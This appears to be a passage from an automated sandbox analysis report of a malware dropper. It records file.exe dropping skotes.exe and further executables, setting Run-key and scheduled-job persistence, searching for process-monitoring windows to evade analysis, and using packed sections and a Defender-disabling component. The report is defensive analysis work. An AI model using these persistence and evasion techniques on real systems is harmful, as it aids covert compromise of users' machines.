Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 3210240 > 1048576
Source: file.exe Static PE information: Raw size of nnwaoodm is bigger than: 0x100000 < 0x2a4000
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 9c2827fca4.exe, 0000001C.00000003.2709881052.0000000004770000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 0000001C.00000002.2843648513.0000000000672000.00000040.00000001.01000000.00000012.sdmp, 9c2827fca4.exe, 00000021.00000003.2837715853.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, 9c2827fca4.exe, 00000021.00000002.2878103010.0000000000672000.00000040.00000001.01000000.00000012.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.9e0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nnwaoodm:EW;ocwkoyql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Unpacked PE file: 9.2.37df924488.exe.680000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Unpacked PE file: 10.2.ae5cfd188c.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Unpacked PE file: 27.2.37df924488.exe.680000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ipnqzgkg:EW;equqovlh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Unpacked PE file: 28.2.9c2827fca4.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;cdtvwakf:EW;qjmihuav:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Unpacked PE file: 33.2.9c2827fca4.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;cdtvwakf:EW;qjmihuav:EW;.taggant:EW; vs :ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_006742DE
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1de5a6 should be: 0x1de476
Source: ae5cfd188c.exe.6.dr Static PE information: real checksum: 0x1de5a6 should be: 0x1de476
Source: random[1].exe2.6.dr Static PE information: real checksum: 0x2cb988 should be: 0x2ccccb
Source: 37df924488.exe.6.dr Static PE information: real checksum: 0x1bd78b should be: 0x1bf97a
Source: file.exe Static PE information: real checksum: 0x31c073 should be: 0x31a034
Source: skotes.exe.0.dr Static PE information: real checksum: 0x31c073 should be: 0x31a034
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1bd78b should be: 0x1bf97a
Source: 9c2827fca4.exe.6.dr Static PE information: real checksum: 0x2cb988 should be: 0x2ccccb
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: nnwaoodm
Source: file.exe Static PE information: section name: ocwkoyql
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name: nnwaoodm
Source: skotes.exe.0.dr Static PE information: section name: ocwkoyql
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: xyjapqsh
Source: random[1].exe.6.dr Static PE information: section name: fjnsenoe
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: ae5cfd188c.exe.6.dr Static PE information: section name:
Source: ae5cfd188c.exe.6.dr Static PE information: section name: .idata
Source: ae5cfd188c.exe.6.dr Static PE information: section name:
Source: ae5cfd188c.exe.6.dr Static PE information: section name: xyjapqsh
Source: ae5cfd188c.exe.6.dr Static PE information: section name: fjnsenoe
Source: ae5cfd188c.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: ipnqzgkg
Source: random[1].exe0.6.dr Static PE information: section name: equqovlh
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 37df924488.exe.6.dr Static PE information: section name:
Source: 37df924488.exe.6.dr Static PE information: section name: .idata
Source: 37df924488.exe.6.dr Static PE information: section name:
Source: 37df924488.exe.6.dr Static PE information: section name: ipnqzgkg
Source: 37df924488.exe.6.dr Static PE information: section name: equqovlh
Source: 37df924488.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name: cdtvwakf
Source: random[1].exe2.6.dr Static PE information: section name: qjmihuav
Source: random[1].exe2.6.dr Static PE information: section name: .taggant
Source: 9c2827fca4.exe.6.dr Static PE information: section name:
Source: 9c2827fca4.exe.6.dr Static PE information: section name: .idata
Source: 9c2827fca4.exe.6.dr Static PE information: section name: cdtvwakf
Source: 9c2827fca4.exe.6.dr Static PE information: section name: qjmihuav
Source: 9c2827fca4.exe.6.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009FD91C push ecx; ret 0_2_009FD92F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009F1359 push es; ret 0_2_009F135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00ABD91C push ecx; ret 1_2_00ABD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00ABD91C push ecx; ret 2_2_00ABD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ABD91C push ecx; ret 6_2_00ABD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ADDEDB push ss; iretd 6_2_00ADDEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ABDFC6 push ecx; ret 6_2_00ABDFD9
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00690A76 push ecx; ret 11_2_00690A89
Source: file.exe Static PE information: section name: entropy: 7.067745136702224
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.067745136702224
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.97823310420282
Source: random[1].exe.6.dr Static PE information: section name: xyjapqsh entropy: 7.953197683807969
Source: ae5cfd188c.exe.6.dr Static PE information: section name: entropy: 7.97823310420282
Source: ae5cfd188c.exe.6.dr Static PE information: section name: xyjapqsh entropy: 7.953197683807969
Source: random[1].exe0.6.dr Static PE information: section name: ipnqzgkg entropy: 7.954190185075461
Source: 37df924488.exe.6.dr Static PE information: section name: ipnqzgkg entropy: 7.954190185075461
Source: random[1].exe2.6.dr Static PE information: section name: entropy: 7.79776762494654
Source: 9c2827fca4.exe.6.dr Static PE information: section name: entropy: 7.79776762494654
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 37df924488.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 37df924488.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 37df924488.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exe Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_0068F98E
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00701C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_00701C41
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process information set: NOOPENFILEERRORBOX
